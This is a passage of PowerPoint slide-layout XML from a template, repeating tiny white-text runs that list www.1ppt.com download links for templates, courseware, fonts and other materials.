              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout105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05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05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05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05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05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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout105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05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05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05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0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06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06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06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06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06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06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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout106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06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06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06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0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07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07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07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07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07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07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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
